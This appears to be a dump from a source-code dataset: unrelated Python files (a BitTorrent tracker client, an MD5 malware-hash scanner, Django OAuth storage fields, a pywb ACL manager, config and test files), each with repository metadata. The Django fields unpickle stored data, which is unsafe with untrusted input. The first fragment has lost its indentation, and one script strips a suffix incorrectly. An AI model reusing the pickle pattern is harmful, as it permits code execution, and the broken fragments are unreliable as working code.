# Update the time we last made a request to the tracker.
self.last_time = time()
# Append total uploaded, total downloaded, and bytes left to download.
s = ('%s&uploaded=%s&downloaded=%s&left=%s' %
(self.url, str(self.up()), str(self.down()),
str(self.amount_left())))
if self.last is not None:
# Append the last time this client made a request to the tracker.
s += '&last=' + quote(str(self.last))
        if self.trackerid is not None:
            # If not the first request, append the id this tracker previously returned.
            s += '&trackerid=' + quote(str(self.trackerid))
if self.howmany() >= self.maxpeers:
# Don't need any more peers to connect to.
s += '&numwant=0'
else:
# Return peer IP and port addresses in 6 binary bytes.
s += '&compact=1'
# Event is not specified if this request is one performed at regular intervals.
if event != None:
s += '&event=' + ['started', 'completed', 'stopped'][event]
# Method that returns True the first time and False every subsequent time.
set = SetOnce().set
def checkfail(self = self, set = set):
if set():
# Only get here if the tracker did not reply and call set() in rerequest first.
if self.last_failed and self.upratefunc() < 100 and self.downratefunc() < 100:
self.errorfunc('Problem connecting to tracker - timeout exceeded')
self.last_failed = True
# Method checkfail will run if the tracker does not reply to this request.
self.sched(checkfail, self.timeout)
Thread(target = self.rerequest, args = [s, set]).start()
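# --- Illustrative sketch (not part of the original client) ---
# The '&compact=1' request above asks the tracker for peers packed as 6 bytes
# each: 4 for the IPv4 address and 2 for a big-endian port. Decoding that
# layout with modern bytes objects looks roughly like this:
def decode_compact_peers(blob):
    peers = []
    for i in range(0, len(blob), 6):
        ip = '.'.join(str(b) for b in blob[i:i + 4])
        port = (blob[i + 4] << 8) | blob[i + 5]
        peers.append((ip, port))
    return peers

assert decode_compact_peers(bytes([127, 0, 0, 1, 0x1A, 0xE1])) == [('127.0.0.1', 6881)]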
def rerequest(self, url, set):
# url is s from method announce.
try:
if self.ip:
# Include our IP address in case we are communicating through a proxy.
url += '&ip=' + gethostbyname(self.ip)
# Read a reply.
h = urlopen(url)
r = h.read()
h.close()
if set():
# Only get here if checkfail did not run and call set() first.
def add(self = self, r = r):
# This call succeeded.
self.last_failed = False
# Process the reply.
self.postrequest(r)
self.externalsched(add, 0)
except (IOError, error), e:
if set():
# Only get here if checkfail did not run and call set() first.
def fail(self = self, r = 'Problem connecting to tracker - ' + str(e)):
if self.last_failed:
self.errorfunc(r)
self.last_failed = True
self.externalsched(fail, 0)
def postrequest(self, data):
try:
r = bdecode(data)
check_peers(r)
if r.has_key('failure reason'):
self.errorfunc('rejected by tracker - ' + r['failure reason'])
else:
if r.has_key('warning message'):
self.errorfunc('warning from tracker - ' + r['warning message'])
self.announce_interval = r.get('interval', self.announce_interval)
self.interval = r.get('min interval', self.interval)
self.trackerid = r.get('tracker id', self.trackerid)
self.last = r.get('last')
p = r['peers']
peers = []
if type(p) == type(''):
# Deserialize the compact binary form.
for x in xrange(0, len(p), 6):
ip = '.'.join([str(ord(i)) for i in p[x:x+4]])
port = (ord(p[x+4]) << 8) | ord(p[x+5])
peers.append((ip, port, None))
else:
for x in p:
peers.append((x['ip'], x['port'], x.get('peer id')))
ps = len(peers) + self.howmany()
if ps < self.maxpeers:
if self.donefla
|
miho030/FoxVc
|
versions - 1.2.x/FoxVc Ver 1.2.7/Foxcore/matchingHashValue.py
|
Python
|
gpl-3.0
| 1,103
| 0.024679
|
# -*- coding: utf-8 -*-
# Author : Republic of Korea, Seoul, JungSan HS 31227 Lee Joon Sung
# Author_Helper : Republic of Korea, KyungGido, Kim Min Seok
# youtube : anonymous0korea0@gmail.com ;;;; tayaka
# Email : miho0_0@naver.com
import hashlib
import logging
#from FoxDBinfor import DB_Pattern
def Matching_Hash_Value(fname, File_Hash_List):
logger = logging.getLogger("FoxVc")
slogger = logging.getLogger("Scan")
    blacklist = ["bin", "BIN", "$RECYCLE", "$RECYCLE.BIN"] # add the recycle bin to the blacklist
try:
with open(fname, 'rb') as f:
buf = f.read()
md5 = hashlib.md5()
md5.update(buf)
# end with-open
fmd5 = md5.hexdigest()
        for hashValue in File_Hash_List: # iterate over the hash list
            if fmd5 == hashValue: # the file's MD5 hash exists in the malware DB
                #INFECTION.append(fname) # add it to the INFECTION list
                return 1
return 0
except IOError as e:
|
logger.error("IOError : Permission denied. / No such file or directory.")
logger.error(e.message)
finally:
pass
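# --- Illustrative sketch (not part of the original scanner) ---
# The core of the check above is an MD5 digest compared against known hashes;
# the file name and hash below are placeholders, not real signatures:
import hashlib

def file_md5(path):
    with open(path, 'rb') as f:
        return hashlib.md5(f.read()).hexdigest()

known_bad_hashes = {"00000000000000000000000000000000"}  # placeholder value
# infected = file_md5("sample.bin") in known_bad_hashes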
|
devs1991/test_edx_docmode
|
venv/lib/python2.7/site-packages/ipware/__init__.py
|
Python
|
agpl-3.0
| 93
| 0
|
# -*- coding: utf-8 -*-
__version__ = '1.1.0'
default_app_config = 'ipware.apps.AppConfig'
|
ntuhpc/modulefiles
|
all/hide.py
|
Python
|
mit
| 413
| 0
|
import os
root_dir = os.path.dirname(os.path.realpath(__file__))
f = open(".modulerc", "w")
f.write("#%Module\n")
sub_dirs = os.walk(root_dir)
next(sub_dirs)
for dir_name, _, file_list in sub_dirs:
for file_name in file_list:
        module_version = file_name.rstrip(".lua")
module_name = os.path.relpath(dir_name, root_dir)
f.write("hide-version %s/%s\n" % (module_name, module_version))
|
goldsborough/ecstasy
|
docs/source/conf.py
|
Python
|
mit
| 9,617
| 0.005303
|
# -*- coding: utf-8 -*-
#
# ecstasy documentation build configuration file, created by
# sphinx-quickstart on Wed Aug 5 21:42:49 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import alabaster
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.3'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ecstasy'
copyright = u'2015, Peter Goldsborough'
author = u'Peter Goldsborough'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1'
# The full version, including alpha/beta/rc tags.
release = '1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
'github_user': 'goldsborough',
'github_repo': 'ecstasy',
'github_banner': True,
'travis_button': "true",
'gratipay_user': "goldsborough",
'extra_nav_links': {"Github Repository": "github.com/goldsborough/ecstasy"}
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [alabaster.get_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "ecstasy"
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'ecstasydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'ecstasy.tex', u'ecstasy Documentation',
u'Peter Goldsborough', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not c
|
jtannas/NOA
|
app/mod_auth/__init__.py
|
Python
|
mit
| 613
| 0.001631
|
''' Initiation procedure for the auth module
Yields:
    - Initiates the Login Manager
'''
# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
from flask_login import LoginManager
from .. import app
# ---------------------------------------------------------------------------
# Define and Configure the login manager
# ---------------------------------------------------------------------------
login_manager = LoginManager()
login_manager.login_view = "auth.signin"
login_manager.init_app(app)
|
andymitrich/pygask
|
application/views.py
|
Python
|
mit
| 88
| 0.011364
|
from flask import render_template
def home():
    return render_template('index.html')
|
MilyMilo/sci-organizer
|
agenda/migrations/0001_initial.py
|
Python
|
mit
| 1,029
| 0.002915
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-09 10:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('groups', '0001_initial'),
]
    operations = [
        migrations.CreateModel(
            name='Event',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=30)),
('description', models.TextField()),
('subject', models.CharField(max_length=20)),
('event_type', models.CharField(choices=[('quiz', 'Quiz'), ('test', 'Test'), ('homework', 'Homework')], max_length=8)),
('due', models.DateTimeField()),
('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='groups.Group')),
],
),
]
|
muLAn-project/muLAn
|
muLAn/models/fhexaBL.py
|
Python
|
mit
| 2,911
| 0.003435
|
# -*-coding:Utf-8 -*
# ====================================================================
# ====================================================================
# Packages
# ====================================================================
import sys
import numpy as np
from muLAn.models.multipole import hexamag
# ====================================================================
# Functions
# ====================================================================
def magnifcalc(t, param, Ds=None, tb=None):
"""Return the hexadecapolar approximation of the magnification."""
### Get parameters
t0 = param['t0']
u0 = param['u0']
tE = param['tE']
rho = param['rho']
gamma = param['gamma']
q = param['q']
piEN = param['piEN']
piEE = param['piEE']
alpha0 = param['alpha']
s0 = param['s']
dalpha = param['dadt']
ds = param['dsdt']
### Lens orbital motion
    alpha, s = lens_rotation(alpha0, s0, dalpha, ds, t, tb)
    ### Parallax
    DsN = Ds['N']
    DsE = Ds['E']
tau = (t-t0)/tE + piEN * DsN + piEE * DsE
beta = u0 + piEN * DsE - piEE * DsN
x, y = binrot(alpha, tau, beta)
### Conversion center of mass to Cassan (2008)
x = x - s*q/(1.+q)
### Compute magnification
zeta0 = x + 1j*y
return np.array([hexamag(s[i], q, rho, gamma, zeta0[i]) for i in range(len(x))])
# --------------------------------------------------------------------
def binrot(theta, x_old, y_old):
"""Rotation by an angle alpha.
:param theta: float, angle in radians.
    :param x_old: numpy array, x coordinate in the old frame.
    :param y_old: numpy array, y coordinate in the old frame.
    :return x_new: numpy array, x coordinate in the new frame.
    :return y_new: numpy array, y coordinate in the new frame.
"""
cos_theta = np.cos(theta)
sin_theta = np.sin(theta)
x_new = x_old * cos_theta - y_old * sin_theta
y_new = x_old * sin_theta + y_old * cos_theta
return x_new, y_new
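# --- Illustrative numerical check (not part of the original module) ---
# The rotation above is the standard 2-D rotation matrix; rotating the point
# (1, 0) by 90 degrees should land on (0, 1):
import numpy as np

def rotate(theta, x_old, y_old):
    c, s = np.cos(theta), np.sin(theta)
    return x_old * c - y_old * s, x_old * s + y_old * c

x_new, y_new = rotate(np.pi / 2, np.array([1.0]), np.array([0.0]))
assert np.allclose([x_new[0], y_new[0]], [0.0, 1.0])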
# --------------------------------------------------------------------
def lens_rotation(alpha0, s0, dalpha, ds, t, tb):
"""Compute the angle alpha and projected separation s for each
time step due to the lens orbital motion.
:param alpha0: angle alpha at date tb.
:param s0: projected separation at date tb.
:param dalpha: float, angular velocity at date tb
(radians.year^-1).
:param ds: change rate of separation (year^-1).
:param t: list of dates.
:param tb: time reference for linear development.
:type alpha0: float
:type s0: float
:type dalpha: float
:type ds: float
:type t: numpy array
:type tb: float
:return: unpacked list of actual alpha and s values at each date.
:rtype: numpy array, numpy array
"""
Cte_yr_d = 365.25 # Julian year in days
alpha = alpha0 - (t - tb) * dalpha / Cte_yr_d
s = s0 + (t-tb) * ds / Cte_yr_d
return alpha, s
|
samuelclay/NewsBlur
|
vendor/oauth2client/django_orm.py
|
Python
|
mit
| 4,342
| 0.008521
|
# Copyright (C) 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""OAuth 2.0 utilities for Django.
Utilities for using OAuth 2.0 in conjunction with
the Django datastore.
"""
__author__ = 'jcgregorio@google.com (Joe Gregorio)'
import oauth2client
import base64
import pickle
from django.db import models
from oauth2client.client import Storage as BaseStorage
class CredentialsField(models.Field):
def __init__(self, *args, **kwargs):
if 'null' not in kwargs:
kwargs['null'] = True
super(CredentialsField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "TextField"
def from_db_value(self, value, expression, connection):
if value is None:
return value
return pickle.loads(base64.b64decode(value))
def to_python(self, value):
if value is None:
return None
if isinstance(value, oauth2client.client.Credentials):
return value
return pickle.loads(base64.b64decode(value))
def get_db_prep_value(self, value, connection, prepared=False):
if value is None:
return None
return base64.b64encode(pickle.dumps(value))
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
del kwargs['null']
return name, path, args, kwargs
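# --- Illustrative sketch (standalone, no Django required) ---
# The field above stores arbitrary picklable objects as base64 text; the
# encode/decode round trip it relies on is simply:
import base64
import pickle

value = {"token": "abc"}                          # any picklable object
stored = base64.b64encode(pickle.dumps(value))    # what ends up in the TextField
restored = pickle.loads(base64.b64decode(stored))
assert restored == value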
class FlowField(models.Field):
def __init__(self, *args, **kwargs):
if 'null' not in kwargs:
kwargs['null'] = True
super(FlowField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "TextField"
def to_python(self, value):
if value is None:
return None
if isinstance(value, oauth2client.client.Flow):
return value
return pickle.loads(base64.b64decode(value))
def from_db_value(self, value, expression, connection):
if value is None:
return None
        return pickle.loads(base64.b64decode(value))  # decode the stored base64 pickle
def get_db_prep_value(self, value, connection, prepared=False):
if value is None:
return None
return base64.b64encode(pickle.dumps(value))
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
del kwargs['null']
return name, path, args, kwargs
class Storage(BaseStorage):
"""Store and retrieve a single credential to and from
the datastore.
This Storage helper presumes the Credentials
    have been stored as a CredentialsField
on a db model class.
"""
def __init__(self, model_class, key_name, key_value, property_name):
"""Constructor for Storage.
Args:
model: db.Model, model class
key_name: string, key name for the entity that has the credentials
key_value: string, key value for the entity that has the credentials
property_name: string, name of the property that is an CredentialsProperty
"""
self.model_class = model_class
self.key_name = key_name
self.key_value = key_value
self.property_name = property_name
def locked_get(self):
"""Retrieve Credential from datastore.
Returns:
oauth2client.Credentials
"""
credential = None
query = {self.key_name: self.key_value}
entities = self.model_class.objects.filter(**query)
if len(entities) > 0:
credential = getattr(entities[0], self.property_name)
if credential and hasattr(credential, 'set_store'):
credential.set_store(self)
return credential
    def locked_put(self, credentials):
        """Write a Credentials to the datastore.
        Args:
            credentials: Credentials, the credentials to store.
        """
        args = {self.key_name: self.key_value}
        entity = self.model_class(**args)
setattr(entity, self.property_name, credentials)
entity.save()
def locked_delete(self):
"""Delete Credentials from the datastore."""
query = {self.key_name: self.key_value}
entities = self.model_class.objects.filter(**query).delete()
|
ikreymer/pywb
|
pywb/manager/aclmanager.py
|
Python
|
gpl-3.0
| 10,869
| 0.001012
|
import os
import re
import sys
from pywb.manager.manager import CollectionsManager
from pywb.utils.canonicalize import canonicalize
from pywb.warcserver.access_checker import AccessChecker
from pywb.warcserver.index.cdxobject import CDXObject
# ============================================================================
class ACLManager(CollectionsManager):
SURT_RX = re.compile('([^:.]+[,)])+')
VALID_ACCESS = ('allow', 'block', 'exclude')
DEFAULT_FILE = 'access-rules.aclj'
def __init__(self, r):
"""
:param argparse.Namespace r: Parsed result from ArgumentParser
:rtype: None
"""
self.rules = []
coll_name = r.coll_name
if not self.is_valid_auto_coll(r.coll_name):
coll_name = ''
self.target = r.coll_name
super(ACLManager, self).__init__(coll_name, must_exist=False)
self.acl_file = None
def process(self, r):
"""
Process acl command
:param argparse.Namespace r: Parsed result from ArgumentParser
:rtype: None
"""
# if target exists as a file, use that
if os.path.isfile(self.target):
self.acl_file = self.target
# otherwise, if auto collection, use default file in ./collections/<coll>/acl/<DEFAULT_FILE>
elif os.path.isdir(self.curr_coll_dir):
self.acl_file = os.path.join(self.acl_dir, self.DEFAULT_FILE)
# else, assume filename (may not exist yet)
else:
self.acl_file = self.target
# for add/import, file doesn't have to exist
if r.op in ('add', 'importtxt'):
self.load_acl(False)
# for other ops (except matching), ensure entire file loads successfully, log errors
elif r.op not in ('match'):
if not self.load_acl(True):
sys.exit(2)
return
# if 'validate', the command itself is validation
if r.op != 'validate':
self.validate()
r.acl_func(self, r)
def is_valid_auto_coll(self, coll_name):
"""Returns T/F indicating if the supplied collection name
is a valid collection
:param coll_name: The collection name to check
:return: T/F indicating a valid collection
:rtype: bool
"""
if not self.COLL_RX.match(coll_name):
return False
if not os.path.isdir(os.path.join(self.COLLS_DIR, coll_name)):
return False
return True
def load_acl(self, must_exist=True):
"""Loads the access control list
:param bool must_exist: Does the acl file have to exist
:return: T/F indicating load success
:rtype: bool
"""
try:
with open(self.acl_file, 'rb') as fh:
for line in fh:
if line:
self.rules.append(CDXObject(line))
return True
except IOError as io:
if must_exist:
print('Error Occured: ' + str(io))
return False
except Exception as e:
print('Error Occured: ' + str(e))
return False
def save_acl(self, r=None):
"""Save the contents of the rules as cdxj entries to
the access control list file
:param argparse.Namespace|None r: Not used
:rtype: None
"""
try:
os.makedirs(os.path.dirname(self.acl_file))
except OSError:
pass
try:
with open(self.acl_file, 'wb') as fh:
for acl in self.rules:
fh.write(acl.to_cdxj().encode('utf-8'))
except Exception as e:
print('Error Saving ACL Rules: ' + str(e))
def to_key(self, url_or_surt, exact_match=False):
""" If 'url_or_surt' already a SURT, use as is
If exact match, add the exact match suffix
:param str url_or_surt: The url or surt to be converted to an acl key
:param bool exact_match: Should the exact match suffix be added to key
:rtype: str
"""
if self.SURT_RX.search(url_or_surt):
result = url_or_surt
else:
result = canonicalize(url_or_surt)
if exact_match:
result += AccessChecker.EXACT_SUFFIX
return result
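# --- Illustrative sketch (assumes pywb is installed) ---
# to_key above passes plain URLs through pywb's canonicalize, which produces
# SURT-style keys; the exact output below is indicative, not guaranteed:
from pywb.utils.canonicalize import canonicalize

key = canonicalize("https://example.com/path")
print(key)  # typically something like 'com,example)/path'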
def validate_access(self, access):
"""Returns true if the supplied access value is valid
otherwise terminates the process
:param str access: The access value to be validated
:return: True if valid
:rtype: bool
"""
if access not in self.VALID_ACCESS:
print('Valid access values are: ' + ', '.join(self.VALID_ACCESS))
sys.exit(1)
return True
def add_rule(self, r):
"""Adds a rule the ACL manager
:param argparse.Namespace r: The argparse namespace representing the rule to be added
:rtype: None
"""
return self._add_rule(r.url, r.access, r.exact_match)
def _add_rule(self, url, access, exact_match=False):
"""Adds an rule to the acl file
:param str url: The URL for the rule
:param str access: The access value for the rule
:param bool exact_match: Is the rule to be added an exact match
:rtype: None
"""
if not self.validate_access(access):
return
acl = CDXObject()
acl['urlkey'] = self.to_key(url, exact_match)
acl['timestamp'] = '-'
acl['access'] = access
acl['url'] = url
i = 0
replace = False
for rule in self.rules:
if acl['urlkey'] == rule['urlkey'] and acl['timestamp'] == rule['timestamp']:
replace = True
break
if acl > rule:
break
i += 1
if replace:
print('Existing Rule Found, Replacing:')
self.print_rule(self.rules[i])
print('with:')
self.print_rule(acl)
self.rules[i] = acl
else:
print('Added new Rule:')
self.print_rule(acl)
|
self.rules.insert(i, acl)
self.save_acl()
def validate_save(self, r=None, log=False):
"""Validates the acl rules and saves the file
|
:param argparse.Namespace|None r: Not used
:param bool log: Should a report be printed to stdout
:rtype: None
"""
self.validate(log=log, correct=True)
def validate(self, log=False, correct=False):
"""Validates the acl rules returning T/F if the list should be saved
:param bool log: Should the results of validating be logged to stdout
:param bool correct: Should invalid results be corrected and saved
:rtype: None
"""
last_rule = None
out_of_order = False
for rule in self.rules:
if last_rule and rule > last_rule:
out_of_order = True
break
last_rule = rule
if out_of_order:
if log:
print('Rules out of order, resorting')
if correct:
self.rules.sort(reverse=True)
self.save_acl()
elif log:
print('Rules in order')
def remove_rule(self, r):
"""Removes a rule from the acl file
:param argparse.Namespace r: Parsed result from ArgumentParser
:rtype: None
"""
i = 0
urlkey = self.to_key(r.url, r.exact_match)
for rule in self.rules:
if urlkey == rule['urlkey']:
acl = self.rules.pop(i)
print('Removed Rule:')
self.print_rule(acl)
self.save_acl()
return
i += 1
print('Rule to remove not found!')
def list_rules(self, r):
"""Print the acl rules to the stdout
:param argparse.Namespace|None r: Not used
:rtype: None
"""
print('Rules for {0} from {1}:'.format(self.target, self.acl_file))
print('')
for rule in self.rules:
sys.stdout.write(rule.to_c
|
ruchee/vimrc
|
vimfiles/bundle/vim-python/submodules/pylint/tests/functional/c/condition_evals_to_constant.py
|
Python
|
mit
| 1,666
| 0.001801
|
"""Test that boolean conditions simplify to a constant value"""
# pylint: disable=pointless-statement
from unknown import Unknown # pylint: disable=import-error
def func(_):
"""Pointless function"""
CONSTANT = 100
OTHER = 200
# Simplifies any boolean expression that is coerced into a True/False value
bool(CONSTANT or True) # [condition-evals-to-constant]
assert CONSTANT or True # [condition-evals-to-constant]
if CONSTANT and False: # [condition-evals-to-constant]
pass
elif CONSTANT and False: # [condition-evals-to-constant]
pass
while CONSTANT and False: # [condition-evals-to-constant]
break
    1 if CONSTANT or True else 2  # [condition-evals-to-constant]
    z = [x for x in range(10) if x or True]  # [condition-evals-to-constant]
# Simplifies recursively
assert True or CONSTANT or OTHER # [condition-evals-to-constant]
assert (CONSTANT or True) or (CONSTANT or True) # [condition-evals-to-constant]
# Will try to infer the truthiness of an expression as long as it doesn't contain any variables
assert 3 + 4 or CONSTANT # [condition-evals-to-constant]
assert Unknown or True # [condition-evals-to-constant]
assert True or True # [condition-evals-to-constant]
assert False or False # [condition-evals-to-constant]
assert True and True # [condition-evals-to-constant]
assert False and False # [condition-evals-to-constant]
# A bare constant that's not inside of a boolean operation will emit `using-constant-test` instead
if True: # pylint: disable=using-constant-test
pass
# Expressions not in one of the above situations will not emit a message
CONSTANT or True
bool(CONSTANT or OTHER)
bool(func(CONSTANT or True))
|
rootio/rootio_web
|
alembic/versions/31d36774c549_first_and_second_sim.py
|
Python
|
agpl-3.0
| 673
| 0.007429
|
"""split gsm signal in two analytics, one per sim card
Revision ID: 31d36774c549
Revises: 528f90a47515
Create Date: 2019-01-23 15:16:58.514742
"""
# revision identifiers, used by Alembic.
revision = '31d36774c549'
down_revision = '528f90a47515'
from alembic import op
import sqlalchemy as sa
def upgrade():
    op.alter_column('radio_stationanalytic', 'gsm_signal', new_column_name='gsm_signal_1')
op.add_column('radio_stationanalytic', sa.Column('gsm_signal_2', sa.Integer(), nullable=True))
def downgrade():
op.alter_column('radio_stationanalytic', 'gsm_signal_1', new_column_name='gsm_signal')
op.drop_column('radio_stationanalytic', 'gsm_signal_2')
|
pafluxa/todsynth
|
build/lib.linux-x86_64-2.7/todsynth/calibration/calibrator.py
|
Python
|
gpl-3.0
| 2,810
| 0.025267
|
import todsynth
import os
import numpy
import json
import pandas
class Calibrator( object ):
'''
A todsynth.calibrator object is a container that stores coefficients
that transform RAW dac units to physical units for a given TOD.
'''
# Calibrator description.
#000000000000000000000000000000000000000000000000000000000000000000000000
name = ""
description = ""
calType = ""
# Information stored in the form of a dictionary. Careful not to abuse
# of this in the sense of using it to process data!
info = {}
#000000000000000000000000000000000000000000000000000000000000000000000000
# Calibration coefficients
coeffs = numpy.empty(0)
# Detector index to Unique Identifier array
__uid = numpy.empty(0)
def __init__( self ):
'''
self.name = name
self.description = descrp
self.calType = calType
'''
def setCoeffs( self, c , uid=None ):
'''
Set calibrator coefficients to c.
'''
# Perform numpy.copy() to avoid cross referencing stuff
self.__coeffs = numpy.copy( c )
if uid is not None:
self.__uid = numpy.copy(uid)
self.coeffs = self.coeffs[ self.__uid ]
else:
self.__uid = numpy.arange( len( self.coeffs ) )
def getCoeffs( self ):
'''
Get a *copy* of the coefficients array.
'''
return numpy.copy( self.coeffs )
def updateInfo( self, prop, value ):
'''
Update calibrator info with a pair of prop : value
'''
        self.info.update( { prop : value } )
def storeInPath( self , outPath ):
'''
Stores the calibrator in JSON format at the specified path.
'''
# Serialize this object
data = {
'coefficients' : self.__coeffs,
'uid' : self.__uid }
# Create PANDAS DataFrame out data
df = pandas.DataFrame( data )
# Save DataFrame to HDF5 format
df.to_csv( os.path.join(
outPath, "%s.%s.cal" % (self.name,self.calType) ),
index=False,
sep=' ',
header=True )
@classmethod
def readFromPath( cls, systemPath ):
'''
'''
self = cls()
name,caltype,_ = os.path.basename( systemPath ).split('.')
self.name = name
        self.calType = caltype
self.description = ''
# Load file
calDF = pandas.read_csv(
systemPath,
header=0,
names=['coefficients', 'uid'],
delimiter=' ' )
        self.setCoeffs( calDF['coefficients'], uid = calDF['uid'] )
return self
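# --- Illustrative round trip (file name is an assumption) ---
# The calibrator above persists two space-separated columns via pandas; the
# same format can be written and read back like this:
import pandas

df = pandas.DataFrame({"coefficients": [1.0, 2.0], "uid": [0, 1]})
df.to_csv("example.cal", index=False, sep=" ", header=True)
back = pandas.read_csv("example.cal", delimiter=" ")
assert list(back["uid"]) == [0, 1]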
|
DMSC-Instrument-Data/lewis
|
src/lewis/core/devices.py
|
Python
|
gpl-3.0
| 19,330
| 0.004656
|
# -*- coding: utf-8 -*-
# *********************************************************************
# lewis - a library for creating hardware device simulators
# Copyright (C) 2016-2017 European Spallation Source ERIC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# *********************************************************************
|
"""
This module contains :class:`DeviceBase` as a base class for other device classes and
